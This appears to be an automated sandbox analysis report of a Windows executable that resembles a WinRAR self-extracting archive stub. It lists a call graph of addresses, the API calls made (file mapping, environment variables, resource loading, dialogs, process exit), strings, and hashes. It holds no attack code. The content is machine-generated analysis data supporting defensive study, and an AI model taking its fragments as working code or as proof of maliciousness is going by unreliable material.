24566 41d114 24536->24566 24538 419243 24540 41d114 118 API calls 24538->24540 24541 41928a 24538->24541 24575 41d300 97 API calls __InternalCxxFrameHandler 24538->24575 24540->24538 24541->24511 24542->24493 24543->24513 24544->24496 24546 41d072 24545->24546 24547 41d084 24545->24547 24576 41603a 82 API calls 24546->24576 24577 41603a 82 API calls 24547->24577 24550 41d07c 24550->24497 24551->24511 24552->24513 24554 4222a1 24553->24554 24555 4222ba 24554->24555 24558 4222ce 24554->24558 24578 420eed 86 API calls 24555->24578 24557 4222c1 24557->24558 24559->24493 24560->24520 24561->24526 24562->24525 24564 41b146 GetVersionExW 24563->24564 24565 417c69 24564->24565 24565->24535 24572 41d12a __InternalCxxFrameHandler 24566->24572 24567 41d29a 24568 41d2ce 24567->24568 24569 41d0cb 6 API calls 24567->24569 24570 420e08 SetThreadExecutionState RaiseException 24568->24570 24569->24568 24573 41d291 24570->24573 24571 428c8d 103 API calls 24571->24572 24572->24567 24572->24571 24572->24573 24574 41ac05 91 API calls 24572->24574 24573->24538 24574->24572 24575->24538 24576->24550 24577->24550 24578->24557 24579->24297 24580->24297 24581->24294 24583 415d2a 24582->24583 24629 415c4b 24583->24629 24585 415d5d 24587 415d95 24585->24587 24634 41b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24585->24634 24587->24312 24589 418186 24588->24589 24590 418232 24589->24590 24641 41be5e 19 API calls __InternalCxxFrameHandler 24589->24641 24640 421fac CharUpperW 24590->24640 24593 41823b 24593->24315 24595 417c22 24594->24595 24596 417c5a 24595->24596 24642 416e7a 74 API calls 24595->24642 24596->24320 24598 417c52 24643 41138b 74 API calls 24598->24643 24600->24379 24602 419db3 24601->24602 24604 419dc2 24601->24604 24603 419db9 FlushFileBuffers 24602->24603 24602->24604 24603->24604 24605 419e3f SetFileTime 24604->24605 24605->24383 24606->24304 24607->24311 24608->24311 24609->24320 24610->24320 24611->24322 24612->24334 24613->24329 24614->24334 24616 418b5a 24615->24616 24617 4198c5 GetFileType 24615->24617 24616->24348 24618 412021 74 API calls 24616->24618 24617->24616 24618->24346 24619->24348 24620->24349 24621->24374 24622->24374 24623->24374 24624->24374 24625->24374 24626->24377 24627->24386 24628->24328 24635 415b48 24629->24635 24632 415c6c 24632->24585 24633 415b48 2 API calls 24633->24632 24634->24585 24636 415b52 24635->24636 24638 415c3a 24636->24638 24639 41b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24636->24639 24638->24632 24638->24633 24639->24636 24640->24593 24641->24590 24642->24598 24643->24596 24645 41cef2 24644->24645 24650 41a99e 24645->24650 24647 41cf24 24648 41a99e 86 API calls 24647->24648 24649 41cf2f 24648->24649 24651 41a9c1 24650->24651 24654 41a9d5 24650->24654 24655 420eed 86 API calls 24651->24655 24653 41a9c8 24653->24654 24654->24647 24655->24653 24656->24394 24658 41a6a8 24657->24658 24659 41a6c1 FindFirstFileW 24658->24659 24660 41a727 FindNextFileW 24658->24660 24661 41a6d0 24659->24661 24667 41a709 24659->24667 24662 41a732 GetLastError 24660->24662 24660->24667 24663 41bb03 GetCurrentDirectoryW 24661->24663 24662->24667 24664 41a6e0 24663->24664 24665 41a6e4 FindFirstFileW 24664->24665 24666 41a6fe GetLastError 24664->24666 24665->24666 24665->24667 24666->24667 24667->24245 24677 42a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24668->24677 24670 42a5cd 24671 42a5d9 24670->24671 24678 42a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24670->24678 24671->24046 24671->24047 24673->24050 24674->24056 24675->24056 24676->24059 24677->24670 24678->24671 24679->24065 24681 419f42 78 API calls 24680->24681 24682 411fe8 24681->24682 24683 411a04 101 API calls 24682->24683 24686 412005 24682->24686 24684 411ff5 24683->24684 24684->24686 24687 41138b 74 API calls 24684->24687 24686->24073 24686->24074 24687->24686 25441 4294e0 GetClientRect 25442 42f2e0 46 API calls __RTC_Initialize 25486 4221e0 26 API calls std::bad_exception::bad_exception 25443 43bee0 GetCommandLineA GetCommandLineW 24688 42eae7 24689 42eaf1 24688->24689 24690 42e85d ___delayLoadHelper2@8 14 API calls 24689->24690 24691 42eafe 24690->24691 25444 42f4e7 29 API calls _abort 25488 41f1e8 FreeLibrary 25445 415ef0 82 API calls 25490 4195f0 80 API calls 24700 4398f0 24708 43adaf 24700->24708 24703 439904 24705 43990c 24706 439919 24705->24706 24716 439920 11 API calls 24705->24716 24717 43ac98 24708->24717 24711 43adee TlsAlloc 24712 43addf 24711->24712 24713 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24712->24713 24714 4398fa 24713->24714 24714->24703 24715 439869 20 API calls 2 library calls 24714->24715 24715->24705 24716->24703 24718 43acc8 24717->24718 24719 43acc4 24717->24719 24718->24711 24718->24712 24719->24718 24720 43ace8 24719->24720 24724 43ad34 24719->24724 24720->24718 24722 43acf4 GetProcAddress 24720->24722 24723 43ad04 _abort 24722->24723 24723->24718 24725 43ad55 LoadLibraryExW 24724->24725 24726 43ad4a 24724->24726 24727 43ad72 GetLastError 24725->24727 24728 43ad8a 24725->24728 24726->24719 24727->24728 24729 43ad7d LoadLibraryExW 24727->24729 24728->24726 24730 43ada1 FreeLibrary 24728->24730 24729->24728 24730->24726 24731 43abf0 24734 43abfb 24731->24734 24733 43ac24 24744 43ac50 DeleteCriticalSection 24733->24744 24734->24733 24736 43ac20 24734->24736 24737 43af0a 24734->24737 24738 43ac98 _abort 5 API calls 24737->24738 24739 43af31 24738->24739 24740 43af4f InitializeCriticalSectionAndSpinCount 24739->24740 24741 43af3a 24739->24741 24740->24741 24742 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24741->24742 24743 43af66 24742->24743 24743->24734 24744->24736 25446 4388f0 7 API calls ___scrt_uninitialize_crt 25492 42fd4f 9 API calls 2 library calls 25448 432cfb 38 API calls 4 library calls 25493 429580 6 API calls 25449 42c793 102 API calls 5 library calls 25451 42c793 97 API calls 4 library calls 25497 42b18d 78 API calls 25498 42f3a0 27 API calls 25455 43a4a0 71 API calls _free 25456 42dca1 DialogBoxParamW 25457 4408a0 IsProcessorFeaturePresent 25499 42eda7 48 API calls _unexpected 25501 416faa 111 API calls 3 library calls 24790 42f3b2 24791 42f3be ___scrt_is_nonwritable_in_current_image 24790->24791 24822 42eed7 24791->24822 24793 42f3c5 24794 42f518 24793->24794 24797 42f3ef 24793->24797 24895 42f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24794->24895 24796 42f51f 24888 437f58 24796->24888 24810 42f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24797->24810 24833 438aed 24797->24833 24804 42f40e 24806 42f48f 24841 42f953 GetStartupInfoW _abort 24806->24841 24808 42f495 24842 438a3e 51 API calls 24808->24842 24810->24806 24891 437af4 38 API calls _abort 24810->24891 24811 42f49d 24843 42df1e 24811->24843 24816 42f4b1 24816->24796 24817 42f4b5 24816->24817 24818 42f4be 24817->24818 24893 437efb 28 API calls _abort 24817->24893 24894 42f048 12 API calls ___scrt_uninitialize_crt 24818->24894 24821 42f4c6 24821->24804 24823 42eee0 24822->24823 24897 42f654 IsProcessorFeaturePresent 24823->24897 24825 42eeec 24898 432a5e 24825->24898 24827 42eef1 24832 42eef5 24827->24832 24906 438977 24827->24906 24830 42ef0c 24830->24793 24832->24793 24834 438b04 24833->24834 24835 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24834->24835 24836 42f408 24835->24836 24836->24804 24837 438a91 24836->24837 24838 438ac0 24837->24838 24839 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24838->24839 24840 438ae9 24839->24840 24840->24810 24841->24808 24842->24811 24999 420863 24843->24999 24847 42df3d 25048 42ac16 24847->25048 24849 42df46 _abort 24850 42df59 GetCommandLineW 24849->24850 24851 42dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24850->24851 24852 42df68 24850->24852 24854 414092 _swprintf 51 API calls 24851->24854 25052 42c5c4 24852->25052 24855 42e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24854->24855 25063 42b6dd LoadBitmapW 24855->25063 24858 42dfe0 25057 42dbde 24858->25057 24859 42df76 OpenFileMappingW 24861 42dfd6 CloseHandle 24859->24861 24862 42df8f MapViewOfFile 24859->24862 24861->24851 24865 42dfa0 __InternalCxxFrameHandler 24862->24865 24866 42dfcd UnmapViewOfFile 24862->24866 24870 42dbde 2 API calls 24865->24870 24866->24861 24872 42dfbc 24870->24872 24871 4290b7 8 API calls 24873 42e0aa DialogBoxParamW 24871->24873 24872->24866 24874 42e0e4 24873->24874 24875 42e0f6 Sleep 24874->24875 24876 42e0fd 24874->24876 24875->24876 24879 42e10b 24876->24879 25093 42ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24876->25093 24878 42e12a DeleteObject 24880 42e13f DeleteObject 24878->24880 24881 42e146 24878->24881 24879->24878 24880->24881 24882 42e177 24881->24882 24883 42e189 24881->24883 25094 42dc3b 6 API calls 24882->25094 25090 42ac7c 24883->25090 24885 42e17d CloseHandle 24885->24883 24887 42e1c3 24892 42f993 GetModuleHandleW 24887->24892 25226 437cd5 24888->25226 24891->24806 24892->24816 24893->24818 24894->24821 24895->24796 24897->24825 24910 433b07 24898->24910 24902 432a6f 24903 432a7a 24902->24903 24924 433b43 DeleteCriticalSection 24902->24924 24903->24827 24905 432a67 24905->24827 24953 43c05a 24906->24953 24909 432a7d 7 API calls 2 library calls 24909->24832 24912 433b10 24910->24912 24913 433b39 24912->24913 24914 432a63 24912->24914 24925 433d46 24912->24925 24930 433b43 DeleteCriticalSection 24913->24930 24914->24905 24916 432b8c 24914->24916 24946 433c57 24916->24946 24918 432ba1 24918->24902 24921 432baf 24922 432bbc 24921->24922 24952 432bbf 6 API calls ___vcrt_FlsFree 24921->24952 24922->24902 24924->24905 24931 433c0d 24925->24931 24928 433d7e InitializeCriticalSectionAndSpinCount 24929 433d69 24928->24929 24929->24912 24930->24914 24932 433c26 24931->24932 24936 433c4f 24931->24936 24932->24936 24938 433b72 24932->24938 24935 433c3b GetProcAddress 24935->24936 24937 433c49 24935->24937 24936->24928 24936->24929 24937->24936 24944 433b7e ___vcrt_FlsSetValue 24938->24944 24939 433b95 LoadLibraryExW 24941 433bb3 GetLastError 24939->24941 24942 433bfa 24939->24942 24940 433bf3 24940->24935 24940->24936 24941->24944 24942->24940 24943 433c02 FreeLibrary 24942->24943 24943->24940 24944->24939 24944->24940 24945 433bd5 LoadLibraryExW 24944->24945 24945->24942 24945->24944 24947 433c0d ___vcrt_FlsSetValue 5 API calls 24946->24947 24948 433c71 24947->24948 24949 433c8a TlsAlloc 24948->24949 24950 432b96 24948->24950 24950->24918 24951 433d08 6 API calls ___vcrt_FlsSetValue 24950->24951 24951->24921 24952->24918 24954 43c077 24953->24954 24957 43c073 24953->24957 24954->24957 24959 43a6a0 24954->24959 24955 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24956 42eefe 24955->24956 24956->24830 24956->24909 24957->24955 24960 43a6ac ___scrt_is_nonwritable_in_current_image 24959->24960 24971 43ac31 EnterCriticalSection 24960->24971 24962 43a6b3 24972 43c528 24962->24972 24964 43a6c2 24965 43a6d1 24964->24965 24985 43a529 29 API calls 24964->24985 24987 43a6ed LeaveCriticalSection _abort 24965->24987 24968 43a6cc 24986 43a5df GetStdHandle GetFileType 24968->24986 24970 43a6e2 _abort 24970->24954 24971->24962 24973 43c534 ___scrt_is_nonwritable_in_current_image 24972->24973 24974 43c541 24973->24974 24975 43c558 24973->24975 24996 4391a8 20 API calls _abort 24974->24996 24988 43ac31 EnterCriticalSection 24975->24988 24978 43c546 24997 439087 26 API calls _abort 24978->24997 24980 43c590 24998 43c5b7 LeaveCriticalSection _abort 24980->24998 24981 43c550 _abort 24981->24964 24984 43c564 24984->24980 24989 43c479 24984->24989 24985->24968 24986->24965 24987->24970 24988->24984 24990 43b136 _abort 20 API calls 24989->24990 24992 43c48b 24990->24992 24991 43c498 24993 438dcc _free 20 API calls 24991->24993 24992->24991 24994 43af0a 11 API calls 24992->24994 24995 43c4ea 24993->24995 24994->24992 24995->24984 24996->24978 24997->24981 24998->24981 25000 42ec50 24999->25000 25001 42086d GetModuleHandleW 25000->25001 25002 4208e7 25001->25002 25003 420888 GetProcAddress 25001->25003 25004 420c14 GetModuleFileNameW 25002->25004 25104 4375fb 42 API calls 2 library calls 25002->25104 25005 4208a1 25003->25005 25006 4208b9 GetProcAddress 25003->25006 25015 420c32 25004->25015 25005->25006 25008 4208cb 25006->25008 25008->25002 25009 420b54 25009->25004 25010 420b5f GetModuleFileNameW CreateFileW 25009->25010 25011 420c08 CloseHandle 25010->25011 25012 420b8f SetFilePointer 25010->25012 25011->25004 25012->25011 25013 420b9d ReadFile 25012->25013 25013->25011 25016 420bbb 25013->25016 25018 420c94 GetFileAttributesW 25015->25018 25019 420cac 25015->25019 25021 420c5d CompareStringW 25015->25021 25095 41b146 25015->25095 25098 42081b 25015->25098 25016->25011 25020 42081b 2 API calls 25016->25020 25018->25015 25018->25019 25022 420cb7 25019->25022 25025 420cec 25019->25025 25020->25016 25021->25015 25024 420cd0 GetFileAttributesW 25022->25024 25027 420ce8 25022->25027 25023 420dfb 25047 42a64d GetCurrentDirectoryW 25023->25047 25024->25022 25024->25027 25025->25023 25026 41b146 GetVersionExW 25025->25026 25028 420d06 25026->25028 25027->25025 25029 420d73 25028->25029 25030 420d0d 25028->25030 25031 414092 _swprintf 51 API calls 25029->25031 25032 42081b 2 API calls 25030->25032 25033 420d9b AllocConsole 25031->25033 25034 420d17 25032->25034 25035 420df3 ExitProcess 25033->25035 25036 420da8 GetCurrentProcessId AttachConsole 25033->25036 25037 42081b 2 API calls 25034->25037 25105 433e13 25036->25105 25039 420d21 25037->25039 25041 41e617 53 API calls 25039->25041 25040 420dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25040->25035 25042 420d3c 25041->25042 25043 414092 _swprintf 51 API calls 25042->25043 25044 420d4f 25043->25044 25045 41e617 53 API calls 25044->25045 25046 420d5e 25045->25046 25046->25035 25047->24847 25049 42081b 2 API calls 25048->25049 25050 42ac2a OleInitialize 25049->25050 25051 42ac4d GdiplusStartup SHGetMalloc 25050->25051 25051->24849 25054 42c5ce 25052->25054 25053 42c6e4 25053->24858 25053->24859 25054->25053 25055 421fac CharUpperW 25054->25055 25107 41f3fa 82 API calls 2 library calls 25054->25107 25055->25054 25058 42ec50 25057->25058 25059 42dbeb SetEnvironmentVariableW 25058->25059 25061 42dc0e 25059->25061 25060 42dc36 25060->24851 25061->25060 25062 42dc2a SetEnvironmentVariableW 25061->25062 25062->25060 25064 42b70b GetObjectW 25063->25064 25065 42b6fe 25063->25065 25067 42b71a 25064->25067 25108 42a6c2 FindResourceW 25065->25108 25069 42a5c6 4 API calls 25067->25069 25070 42b72d 25069->25070 25071 42b770 25070->25071 25072 42b74c 25070->25072 25074 42a6c2 13 API calls 25070->25074 25082 41da42 25071->25082 25124 42a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25072->25124 25076 42b73d 25074->25076 25075 42b754 25125 42a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25075->25125 25076->25072 25077 42b743 DeleteObject 25076->25077 25077->25072 25079 42b75d 25126 42a80c 8 API calls 25079->25126 25081 42b764 DeleteObject 25081->25071 25135 41da67 25082->25135 25087 4290b7 25088 42eb38 8 API calls 25087->25088 25089 4290d6 25088->25089 25089->24871 25091 42acab GdiplusShutdown CoUninitialize 25090->25091 25091->24887 25093->24879 25094->24885 25096 41b196 25095->25096 25097 41b15a GetVersionExW 25095->25097 25096->25015 25097->25096 25099 42ec50 25098->25099 25100 420828 GetSystemDirectoryW 25099->25100 25101 420840 25100->25101 25102 42085e 25100->25102 25103 420851 LoadLibraryW 25101->25103 25102->25015 25103->25102 25104->25009 25106 433e1b 25105->25106 25106->25040 25106->25106 25107->25054 25109 42a6e5 SizeofResource 25108->25109 25110 42a7d3 25108->25110 25109->25110 25111 42a6fc LoadResource 25109->25111 25110->25064 25110->25067 25111->25110 25112 42a711 LockResource 25111->25112 25112->25110 25113 42a722 GlobalAlloc 25112->25113 25113->25110 25114 42a73d GlobalLock 25113->25114 25115 42a7cc GlobalFree 25114->25115 25116 42a74c __InternalCxxFrameHandler 25114->25116 25115->25110 25117 42a754 CreateStreamOnHGlobal 25116->25117 25118 42a7c5 GlobalUnlock 25117->25118 25119 42a76c 25117->25119 25118->25115 25127 42a626 GdipAlloc 25119->25127 25122 42a7b0 25122->25118 25123 42a79a GdipCreateHBITMAPFromBitmap 25123->25122 25124->25075 25125->25079 25126->25081 25128 42a645 25127->25128 25129 42a638 25127->25129 25128->25118 25128->25122 25128->25123 25131 42a3b9 25129->25131 25132 42a3e1 GdipCreateBitmapFromStream 25131->25132 25133 42a3da GdipCreateBitmapFromStreamICM 25131->25133 25134 42a3e6 25132->25134 25133->25134 25134->25128 25136 41da75 _wcschr __EH_prolog 25135->25136 25137 41daa4 GetModuleFileNameW 25136->25137 25138 41dad5 25136->25138 25139 41dabe 25137->25139 25181 4198e0 25138->25181 25139->25138 25141 41db31 25192 436310 25141->25192 25142 41959a 80 API calls 25143 41da4e 25142->25143 25179 41e29e GetModuleHandleW FindResourceW 25143->25179 25145 41db44 25148 436310 26 API calls 25145->25148 25146 41db05 25146->25141 25147 41e261 78 API calls 25146->25147 25159 41dd4a 25146->25159 25147->25146 25156 41db56 ___vcrt_FlsSetValue 25148->25156 25149 41dc85 25149->25159 25212 419d70 81 API calls 25149->25212 25151 419e80 79 API calls 25151->25156 25153 41dc9f ___std_exception_copy 25154 419bd0 82 API calls 25153->25154 25153->25159 25157 41dcc8 ___std_exception_copy 25154->25157 25156->25149 25156->25151 25156->25159 25206 419bd0 25156->25206 25211 419d70 81 API calls 25156->25211 25157->25159 25176 41dcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25157->25176 25213 421b84 MultiByteToWideChar 25157->25213 25159->25142 25160 41e159 25165 41e1de 25160->25165 25219 438cce 26 API calls 2 library calls 25160->25219 25162 41e16e 25220 437625 26 API calls 2 library calls 25162->25220 25164 41e214 25168 436310 26 API calls 25164->25168 25165->25164 25171 41e261 78 API calls 25165->25171 25167 41e1c6 25221 41e27c 78 API calls 25167->25221 25170 41e22d 25168->25170 25172 436310 26 API calls 25170->25172 25171->25165 25172->25159 25174 421da7 WideCharToMultiByte 25174->25176 25176->25159 25176->25160 25176->25174 25214 41e5b1 50 API calls __vsnprintf 25176->25214 25215 436159 26 API calls 3 library calls 25176->25215 25216 438cce 26 API calls 2 library calls 25176->25216 25217 437625 26 API calls 2 library calls 25176->25217 25218 41e27c 78 API calls 25176->25218 25180 41da55 25179->25180 25180->25087 25182 4198ea 25181->25182 25183 41994b CreateFileW 25182->25183 25184 41996c GetLastError 25183->25184 25187 4199bb 25183->25187 25185 41bb03 GetCurrentDirectoryW 25184->25185 25186 41998c 25185->25186 25186->25187 25189 419990 CreateFileW GetLastError 25186->25189 25188 4199ff 25187->25188 25190 4199e5 SetFileTime 25187->25190 25188->25146 25189->25187 25191 4199b5 25189->25191 25190->25188 25191->25187 25193 436349 25192->25193 25194 43634d 25193->25194 25205 436375 25193->25205 25222 4391a8 20 API calls _abort 25194->25222 25196 436352 25223 439087 26 API calls _abort 25196->25223 25198 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25200 4366a6 25198->25200 25199 43635d 25201 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25199->25201 25200->25145 25202 436369 25201->25202 25202->25145 25204 436699 25204->25198 25205->25204 25224 436230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25205->25224 25207 419bdc 25206->25207 25208 419be3 25206->25208 25207->25156 25208->25207 25210 419785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25208->25210 25225 416d1a 77 API calls 25208->25225 25210->25208 25211->25156 25212->25153 25213->25176 25214->25176 25215->25176 25216->25176 25217->25176 25218->25176 25219->25162 25220->25167 25221->25165 25222->25196 25223->25199 25224->25205 25225->25208 25227 437ce1 _abort 25226->25227 25228 437cfa 25227->25228 25229 437ce8 25227->25229 25250 43ac31 EnterCriticalSection 25228->25250 25262 437e2f GetModuleHandleW 25229->25262 25232 437ced 25232->25228 25263 437e73 GetModuleHandleExW 25232->25263 25236 437d76 25241 437d8e 25236->25241 25245 438a91 _abort 5 API calls 25236->25245 25238 437d01 25238->25236 25249 437d9f 25238->25249 25271 4387e0 20 API calls _abort 25238->25271 25239 437de8 25272 442390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25239->25272 25240 437dbc 25254 437dee 25240->25254 25246 438a91 _abort 5 API calls 25241->25246 25245->25241 25246->25249 25251 437ddf 25249->25251 25250->25238 25273 43ac81 LeaveCriticalSection 25251->25273 25253 437db8 25253->25239 25253->25240 25274 43b076 25254->25274 25257 437e1c 25259 437e73 _abort 8 API calls 25257->25259 25258 437dfc GetPEB 25258->25257 25260 437e0c GetCurrentProcess TerminateProcess 25258->25260 25261 437e24 ExitProcess 25259->25261 25260->25257 25262->25232 25264 437ec0 25263->25264 25265 437e9d GetProcAddress 25263->25265 25266 437ec6 FreeLibrary 25264->25266 25267 437ecf 25264->25267 25268 437eb2 25265->25268 25266->25267 25269 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25267->25269 25268->25264 25270 437cf9 25269->25270 25270->25228 25271->25236 25273->25253 25275 43b09b 25274->25275 25279 43b091 25274->25279 25276 43ac98 _abort 5 API calls 25275->25276 25276->25279 25277 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25278 437df8 25277->25278 25278->25257 25278->25258 25279->25277 25502 42b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25504 43b1b8 27 API calls 3 library calls 25505 421bbd GetCPInfo IsDBCSLeadByte

                                                              Executed Functions

                                                              Function 0042DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00420863: GetModuleHandleW.KERNEL32(kernel32), ref: 0042087C
                                                                • Part of subcall function 00420863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0042088E
                                                                • Part of subcall function 00420863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004208BF
                                                                • Part of subcall function 0042A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0042A655
                                                                • Part of subcall function 0042AC16: OleInitialize.OLE32(00000000), ref: 0042AC2F
                                                                • Part of subcall function 0042AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042AC66
                                                                • Part of subcall function 0042AC16: SHGetMalloc.SHELL32(00458438), ref: 0042AC70
                                                              • GetCommandLineW.KERNEL32 ref: 0042DF5C
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0042DF83
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0042DF94
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0042DFCE
                                                                • Part of subcall function 0042DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0042DBF4
                                                                • Part of subcall function 0042DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0042DC30
                                                              • CloseHandle.KERNEL32(00000000), ref: 0042DFD7
                                                              • GetModuleFileNameW.KERNEL32(00000000,0046EC90,00000800), ref: 0042DFF2
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,0046EC90), ref: 0042DFFE
                                                              • GetLocalTime.KERNEL32(?), ref: 0042E009
                                                              • _swprintf.LIBCMT ref: 0042E048
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0042E05A
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0042E061
                                                              • LoadIconW.USER32(00000000,00000064), ref: 0042E078
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0042E0C9
                                                              • Sleep.KERNEL32(?), ref: 0042E0F7
                                                              • DeleteObject.GDI32 ref: 0042E130
                                                              • DeleteObject.GDI32(?), ref: 0042E140
                                                              • CloseHandle.KERNEL32 ref: 0042E183
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzF
                                                              • API String ID: 3049964643-722637502
                                                              • Opcode ID: bbb9f49d7674698a48ff7c551613358ff4313c31972a6c455aba32d6319696bf
                                                              • Instruction ID: cae8138b57838e3940175ab010df7b808a546fe122bba982981c657b09f06607
                                                              • Opcode Fuzzy Hash: bbb9f49d7674698a48ff7c551613358ff4313c31972a6c455aba32d6319696bf
                                                              • Instruction Fuzzy Hash: FB61F975A04354ABD320AF62FC49F6B379CAB45B09F40043FF945922A2EB7C9944C76E
                                                              Function 0042A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 888 42a6c2-42a6df FindResourceW 889 42a6e5-42a6f6 SizeofResource 888->889 890 42a7db 888->890 889->890 892 42a6fc-42a70b LoadResource 889->892 891 42a7dd-42a7e1 890->891 892->890 893 42a711-42a71c LockResource 892->893 893->890 894 42a722-42a737 GlobalAlloc 893->894 895 42a7d3-42a7d9 894->895 896 42a73d-42a746 GlobalLock 894->896 895->891 897 42a7cc-42a7cd GlobalFree 896->897 898 42a74c-42a76a call 430320 CreateStreamOnHGlobal 896->898 897->895 901 42a7c5-42a7c6 GlobalUnlock 898->901 902 42a76c-42a78e call 42a626 898->902 901->897 902->901 907 42a790-42a798 902->907 908 42a7b3-42a7c1 907->908 909 42a79a-42a7ae GdipCreateHBITMAPFromBitmap 907->909 908->901 909->908 910 42a7b0 909->910 910->908
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0042B73D,00000066), ref: 0042A6D5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A6EC
                                                              • LoadResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A703
                                                              • LockResource.KERNEL32(00000000,?,?,?,0042B73D,00000066), ref: 0042A712
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0042B73D,00000066), ref: 0042A72D
                                                              • GlobalLock.KERNEL32(00000000), ref: 0042A73E
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0042A762
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0042A7C6
                                                                • Part of subcall function 0042A626: GdipAlloc.GDIPLUS(00000010), ref: 0042A62C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0042A7A7
                                                              • GlobalFree.KERNEL32(00000000), ref: 0042A7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: PNG
